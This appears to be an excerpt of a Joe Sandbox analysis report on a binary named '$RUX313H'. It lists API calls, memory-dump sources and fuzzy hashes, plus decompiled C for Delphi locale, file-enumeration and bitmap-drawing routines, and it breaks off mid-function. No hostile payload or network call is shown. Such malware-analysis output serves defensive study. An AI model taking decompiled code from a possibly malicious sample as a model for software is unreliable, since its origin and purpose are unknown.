                                                                            • Part of subcall function 0040C2D0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                            • Part of subcall function 0040C2D0: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                          • GetThreadLocale.KERNEL32 ref: 0040D8BC
                                                                            • Part of subcall function 0040D74C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                          • String ID: p8b
                                                                          • API String ID: 3734044017-529731021
                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction ID: 917de0a484455ad82c20158439a2a24f06621c5804a29fc775aa2cf17b207d74
                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction Fuzzy Hash: F10129B1C113449AE711BFB1AA463193A60AB1130CF10857FD151762E2EB7D00A8DB6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                          • Instruction ID: 21f552544a71644aa5a29d04448db43bc273ae507e021618840bae1d7485b843
                                                                          • Opcode Fuzzy Hash: 1eb9b05f6550193698417fdfd1abd8b4f720dd67f104cddbbfc16bbf0ec42b4c
                                                                          • Instruction Fuzzy Hash: C431B071704100ABDB15AB66D88286B37A9DF86328720457FF804EF6C7DA7CDC1A8699
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                          • Instruction ID: 271996e333eb2d0f8e3e23676571f4307960fb9fe6b8e39aca4bbd563d4a420a
                                                                          • Opcode Fuzzy Hash: ca5e68894038c338b17cd596c0991537003cad852163082c19a1be6d7e7f9c81
                                                                          • Instruction Fuzzy Hash: 1031C171700100ABDB14EF67D88286B369ADF85328720457FF804EF6C7EA7CDC0A8699
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
• Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                                          • Instruction ID: c0991531ddac9e0079019e73ada339c648f4459b5552238d600e3526c74abf5e
                                                                          • Opcode Fuzzy Hash: 4092cce72e1492469b29ed450f25109bd7218eb8d29261f7a9cbb69d7287a135
                                                                          • Instruction Fuzzy Hash: 24412C30904618DBDB21EBA6C885BDEB7B5EF48308F5045FAA404B7291D73CAE45DE58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000), ref: 0040F16D
                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 0040F1CF
                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00000000,00000000), ref: 0040F1D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
                                                                          • Instruction ID: daf054dd685538e10cf0cfb88bdb67cc68ef1b402af78a2ce0ba985ddb15a516
                                                                          • Opcode Fuzzy Hash: f55870f158cee9a1d6f18cde8792f83b73ebd952d8db967ab993b5bc452fad5b
                                                                          • Instruction Fuzzy Hash: 44119371704100ABDA15AB27DC8296B365ADFC5364B10493FF809EF2C6DA3DDC0A8699
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,Function_000051DB), ref: 0040EBD3
                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040EC33
                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 0040EC43
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                                          • Instruction ID: 9a129490767a9822db482bfa393921b2fcf1aa7a937d9a2231ce8cb683432473
                                                                          • Opcode Fuzzy Hash: 48372c018bd84101f49dc516bbf45a6ced4abc977314169db57e5ea29c748e96
                                                                          • Instruction Fuzzy Hash: 9A310C30D04608EFDB11EBA6C886A9EB7B5EF48304F5045FAA405B73D1D778AF45CA58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(?), ref: 0040EA0C
                                                                          • FindClose.KERNEL32(00000000,?), ref: 0040EA16
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                                          • Instruction ID: 6a2226afb0a8b14f7d31ab3cf4cdd30a4af029b65c76461fbe821aedbeee1211
                                                                          • Opcode Fuzzy Hash: 02548c725d9e45131fd1c362ffdfc86aac1187def22e8373c54bf7181a1369e7
                                                                          • Instruction Fuzzy Hash: 78C08C64E081402BC80023B6CC0282B3008FA84348F840926759BF22C2D93E89248A6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 51%
                                                                          			E00403CB4(int __eax, void* __ebx, void* __eflags) {
                                                                          				char _v8;
                                                                          				char _v15;
                                                                          				char _v20;
                                                                          				intOrPtr _t29;
                                                                          				void* _t32;
                                                                          
                                                                          				_v20 = 0;
                                                                          				_push(_t32);
                                                                          				_push(0x403d1a);
                                                                          				_push( *[fs:edx]);
                                                                          				 *[fs:edx] = _t32 + 0xfffffff0;
                                                                          				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                                          				E004031F4( &_v20, 7,  &_v15);
                                                                          				E0040269C(_v20,  &_v8);
                                                                          				if(_v8 != 0) {
                                                                          				}
                                                                          				_pop(_t29);
                                                                          				 *[fs:eax] = _t29;
                                                                          				_push(E00403D21);
                                                                          				return E00403094( &_v20);
                                                                          			}

                                                                          Statement addresses: 0x00403cbd, 0x00403cc2, 0x00403cc3, 0x00403cc8, 0x00403ccb, 0x00403cda, 0x00403cea, 0x00403cf5, 0x00403d00, 0x00403d00, 0x00403d06, 0x00403d09, 0x00403d0c, 0x00403d19

                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                                          • Instruction ID: 6d3425cb13dc4e10e5c99e835ecbf0d9b5a709cf75aacf138b47c3a7ed30a7d1
                                                                          • Opcode Fuzzy Hash: f7943df5f697ff604979ede478dc829ce2ae39317294e6d377f4d43c8f2bc4e7
                                                                          • Instruction Fuzzy Hash: DDF0C830904209AFEB04DFA2CC42ADEF77EFB88714F10887AA110675C0EBB82B04C648
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                                          • Instruction ID: 7765dcfaf0ac3467b05695104e180fa3b916594c574afae56f7b81e2f936b299
                                                                          • Opcode Fuzzy Hash: 226d36a3a2a6d126d7b518791991f6729a36aae8a22c2ca38394135d70b07227
                                                                          • Instruction Fuzzy Hash: F4F06D31A04309EFEB15DFA1CC51ADEF779FB84714F508576A510675C1D7B82604C758
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LocalTime
                                                                          • String ID:
                                                                          • API String ID: 481472006-0
                                                                          • Opcode ID: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                                          • Instruction ID: 4be9079c8441ee73391fb420eaf64c5b500e0d105d5474b8364197a0399cc555
                                                                          • Opcode Fuzzy Hash: 7c7103a78b60b1e57ed44af7b7ea6f275b95f35198deba2e3da0b3ebacb4dc04
                                                                          • Instruction Fuzzy Hash: 23C08C3980450652C600BB64DC0284AB6A8AEC0200F8089BEA4CCD21E1EB39D31DC3C7
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp, Offset: 022C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_22c0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05431e9a872c7f0021e2b6e11609bc723c439c8a6bcbf61c45db280db772ba5d
                                                                          • Instruction ID: 56fd56cc449bc6843bfa656e9d82b7eae05cdc5c2a46680ff4330973667a736e
                                                                          • Opcode Fuzzy Hash: 05431e9a872c7f0021e2b6e11609bc723c439c8a6bcbf61c45db280db772ba5d
                                                                          • Instruction Fuzzy Hash: 8E22807240E3D19FC7534BB498B56E2BFB4AE2722431E49DBD0C08F067E225195ADB72
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 46%
                                                                          			E0040627C(void* __eax, void* __ebp, void* __eflags) {
                                                                          				struct HDC__* _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _v40;
                                                                          				struct HDC__* _v44;
                                                                          				struct HDC__* _v60;
                                                                          				struct HDC__* _v68;
                                                                          				struct HDC__* _v72;
                                                                          				void* _t59;
                                                                          				struct HBITMAP__* _t62;
                                                                          				void* _t68;
                                                                          				void* _t71;
                                                                          				int _t72;
                                                                          				int _t75;
                                                                          				int _t80;
                                                                          				void* _t81;
                                                                          				void* _t85;
                                                                          				void* _t94;
                                                                          				void* _t100;
                                                                          				void* _t114;
                                                                          				struct HDC__* _t116;
                                                                          				struct HDC__* _t119;
                                                                          				signed int _t121;
                                                                          				struct HBITMAP__* _t124;
                                                                          				struct HBITMAP__* _t125;
                                                                          				RECT* _t126;
                                                                          				void* _t128;
                                                                          
                                                                          				_t128 = __eflags;
                                                                          				_push(__eax);
                                                                          				E00406144(__eax);
                                                                          				_pop(_t59);
                                                                          				if(_t128 != 0) {
                                                                          					asm("pushad");
                                                                          					_t100 = _t59;
                                                                          					 *((intOrPtr*)(_t100 + 0x34))();
                                                                          					 *((intOrPtr*)(_t100 + 0x28)) = 0;
                                                                          					 *((intOrPtr*)(_t100 + 0x56)) = 0;
                                                                          					 *((intOrPtr*)(_t100 + 0x5a)) = 0;
                                                                          					asm("jecxz 0x13");
                                                                          					_t62 =  *(_t100 + 0x3d);
                                                                          					_t121 =  *(_t62 + 4);
                                                                          					_t119 =  *(_t62 + 8);
                                                                          					if(_t119 < 0) {
                                                                          						_t119 =  ~_t119;
                                                                          					}
                                                                          					_push(0);
                                                                          					L00404108();
                                                                          					_push(_t62);
                                                                          					_t130 =  *((char*)(_t100 + 0x3c)) - 1;
                                                                          					if( *((char*)(_t100 + 0x3c)) != 1) {
                                                                          						asm("jecxz 0xfffffff2");
                                                                          						_t124 = 0;
                                                                          						_t110 =  *(_t100 + 0x18);
                                                                          						_push(E00405F70( *((intOrPtr*)(_t100 + 0x1c)),  *((intOrPtr*)(( *(_t100 + 0x49) & 0x000000ff) + 0x409188)),  *(_t100 + 0x18)));
                                                                          						__eflags =  *(_t100 + 0x49) - 5;
                                                                          						if( *(_t100 + 0x49) == 5) {
                                                                          							E0040600C(_t67, _t110);
                                                                          						}
                                                                          						_pop(_t68);
                                                                          						_push(_t68);
                                                                          						_push(E00406268(_t68) *  *(_t100 + 0x18));
                                                                          						_t71 = E00402448(E00406268(_t68) *  *(_t100 + 0x18));
                                                                          						_push(_t71);
                                                                          						_push(0);
                                                                          						_push(_v12);
                                                                          						_push(_t71);
                                                                          						_t72 =  *(_t100 + 0x18);
                                                                          						__eflags = _t72 - _t119;
                                                                          						if(__eflags > 0) {
                                                                          							_t72 = _t119;
                                                                          						}
                                                                          						_t75 = GetDIBits(_v8, E00406154(_t100, __eflags), 0, _t72, ??, ??, ??);
                                                                          						_t113 =  *(_t100 + 0x18);
                                                                          						__eflags = _t113 - _t119;
                                                                          						if(_t113 > _t119) {
                                                                          							_t113 = _t119;
                                                                          						}
                                                                          						__eflags = _t75 - _t113;
                                                                          						if(__eflags != 0) {
                                                                          							_pop(_t81);
                                                                          							E00402468(_t81);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(0);
                                                                          							_push(_t126);
                                                                          							_push(0);
                                                                          							_push(_v40);
                                                                          							_push(_v36);
                                                                          							L00404110();
                                                                          							_t121 = _t121 ^ 0xffffffff;
                                                                          							_t124 = 0;
                                                                          							_t85 = SelectObject(_v60, 0);
                                                                          							_t113 = _v68;
                                                                          							__eflags = 0;
                                                                          							E00406094(_t100, 0, _v68, 0, 0);
                                                                          							SelectObject(_v72, _t85);
                                                                          						}
                                                                          						E00406024(_t100, _t100, _t113, __eflags);
                                                                          						_pop( *_t47);
                                                                          						_pop( *_t48);
                                                                          						_pop( *_t49);
                                                                          						 *(_t100 + 0x20) = _t124;
                                                                          						__eflags = _t121;
                                                                          						 *(_t100 + 0x72) = 0;
                                                                          						if(_t121 < 0) {
                                                                          							_t52 = _t100 + 0x72;
                                                                          							 *_t52 =  *(_t100 + 0x72) + 1;
                                                                          							__eflags =  *_t52;
                                                                          						}
                                                                          					} else {
                                                                          						_push(0);
                                                                          						L00404178();
                                                                          						_push(_t62);
                                                                          						_push( *(_t100 + 0x18));
                                                                          						_push( *((intOrPtr*)(_t100 + 0x1c)));
                                                                          						_push(_t62);
                                                                          						L00404100();
                                                                          						_t125 = _t62;
                                                                          						L00404190();
                                                                          						_t116 = 0;
                                                                          						_push(_t116);
                                                                          						_push(SelectObject(_t116, _t125));
                                                                          						_push( *(_t100 + 0x18));
                                                                          						_push( *((intOrPtr*)(_t100 + 0x1c)));
                                                                          						_push(0);
                                                                          						_t94 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t100 + 0x2c))));
                                                                          						_t117 = _t126;
                                                                          						FillRect(_v44, _t126, _t94);
                                                                          						DeleteObject(_t94);
                                                                          						asm("jecxz 0x24");
                                                                          						SelectObject(_v60, 0);
                                                                          						SetDIBits(_v68, _t125, 0,  *(_t100 + 0x18),  *(_t100 + 0x41),  *(_t100 + 0x3d), 0);
                                                                          						E00406024(_t100, _t100, _t117, _t130);
                                                                          						 *(_t100 + 0x20) = _t125;
                                                                          					}
                                                                          					asm("jecxz 0xa");
                                                                          					_pop(_t114);
                                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t100 + 0x4a))))(_t114);
                                                                          					_t80 = DeleteDC(_t119);
                                                                          					asm("popad");
                                                                          					return _t80;
                                                                          				}
                                                                          				return _t59;
                                                                           			}

                                                                           [Instruction address column of the decompiled listing above: 0x0040627c through 0x0040646b (entries 0x004062e7 to 0x0040637d belong to the else branch); the per-line pairing with the decompiled statements did not survive extraction.]

                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018), ref: 004062C2
                                                                          • 72E7A590.GDI32(00000000,?,00000000,?,00000000), ref: 004062D7
                                                                          • 72E7AC50.USER32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?), ref: 004062E9
                                                                          • 72E7A520.GDI32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004062F6
                                                                          • 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000), ref: 004062FE
                                                                          • SelectObject.GDI32(00000000), ref: 00406307
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00406320
                                                                          • FillRect.USER32 ref: 0040632E
                                                                          • DeleteObject.GDI32(?), ref: 00406333
                                                                          • SelectObject.GDI32(?), ref: 00406344
                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040635B
                                                                          • SelectObject.GDI32(00000000,?), ref: 00406371
                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 004063E4
                                                                          • 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 0040640F
                                                                          • SelectObject.GDI32(?,00000000), ref: 0040641D
                                                                          • SelectObject.GDI32(?,00000000), ref: 00406435
                                                                          • DeleteDC.GDI32 ref: 00406465
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                           • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp
                                                                           • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                          • String ID:
                                                                          • API String ID: 2504469172-0
                                                                          • Opcode ID: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                          • Instruction ID: a9e686f7fc2ed882930d99cc47d1dbb646c45f2a2f24960de351e96cc7451368
                                                                          • Opcode Fuzzy Hash: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                          • Instruction Fuzzy Hash: AE5195B1204200AFDB05AF65CC86F2B3AA9EF94314F1145BEBA45BF1D7C639DC618798
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018), ref: 0040FD5A
                                                                          • 72E7A590.GDI32(00000000), ref: 0040FD6F
                                                                          • 72E7AC50.USER32(00000000,00000000,00000000), ref: 0040FD81
                                                                          • 72E7A520.GDI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD8E
                                                                          • 72E7B380.USER32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD96
                                                                          • SelectObject.GDI32(00000000), ref: 0040FD9F
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0040FDB8
                                                                          • FillRect.USER32 ref: 0040FDC6
                                                                          • DeleteObject.GDI32(?), ref: 0040FDCB
                                                                          • SelectObject.GDI32(?), ref: 0040FDDC
                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040FDF3
                                                                          • SelectObject.GDI32(?), ref: 0040FE09
                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0040FE7C
                                                                          • 72E7A7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040FEA7
                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FEB5
                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FECD
                                                                          • DeleteDC.GDI32(00000000), ref: 0040FEFD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp
                                                                           • Associated: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp
                                                                           • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                          • String ID:
                                                                          • API String ID: 2504469172-0
                                                                          • Opcode ID: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                          • Instruction ID: 8bfa987d25260d88ee3329e71298cc77801f48d1f8f03ee880f1b7424a85638e
                                                                          • Opcode Fuzzy Hash: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                          • Instruction Fuzzy Hash: A051D4716042006FDB14AF65CC82F2B3B69EF84314F1148BEB905BB6D7D639EC088B98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 57%
                                                                          			E00406218(void* __eax, void* __ecx, void* __edx, void* __ebp, void* __eflags) {
                                                                          				struct HDC__* _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _v40;
                                                                          				struct HDC__* _v44;
                                                                          				struct HDC__* _v60;
                                                                          				struct HDC__* _v68;
                                                                          				struct HDC__* _v72;
                                                                          				void* __ebx;
                                                                          				void* _t64;
                                                                          				void* _t66;
                                                                          				struct HBITMAP__* _t69;
                                                                          				void* _t75;
                                                                          				void* _t78;
                                                                          				int _t79;
                                                                          				int _t82;
                                                                          				int _t87;
                                                                          				void* _t88;
                                                                          				void* _t92;
                                                                          				void* _t101;
                                                                          				void* _t108;
                                                                          				void* _t111;
                                                                          				void* _t113;
                                                                          				void* _t115;
                                                                          				void* _t133;
                                                                          				struct HDC__* _t135;
                                                                          				struct HDC__* _t137;
                                                                          				void* _t139;
                                                                          				int* _t140;
                                                                          				struct HDC__* _t142;
                                                                          				signed int _t144;
                                                                          				struct HBITMAP__* _t147;
                                                                          				struct HBITMAP__* _t148;
                                                                          				RECT* _t149;
                                                                          				void* _t151;
                                                                          
                                                                          				_t151 = __eflags;
                                                                          				_t113 = __eax;
                                                                          				_t64 = E00406144(__eax);
                                                                          				if(_t151 == 0) {
                                                                          					L7:
                                                                          					if(__eflags != 0) {
                                                                          						E00406144(_t64);
                                                                          						_t66 = _t64;
                                                                          						if(__eflags != 0) {
                                                                          							asm("pushad");
                                                                          							_t115 = _t66;
                                                                          							 *((intOrPtr*)(_t115 + 0x34))();
                                                                          							 *((intOrPtr*)(_t115 + 0x28)) = 0;
                                                                          							 *((intOrPtr*)(_t115 + 0x56)) = 0;
                                                                          							 *((intOrPtr*)(_t115 + 0x5a)) = 0;
                                                                          							asm("jecxz 0x13");
                                                                          							_t69 =  *(_t115 + 0x3d);
                                                                          							_t144 =  *(_t69 + 4);
                                                                          							_t142 =  *(_t69 + 8);
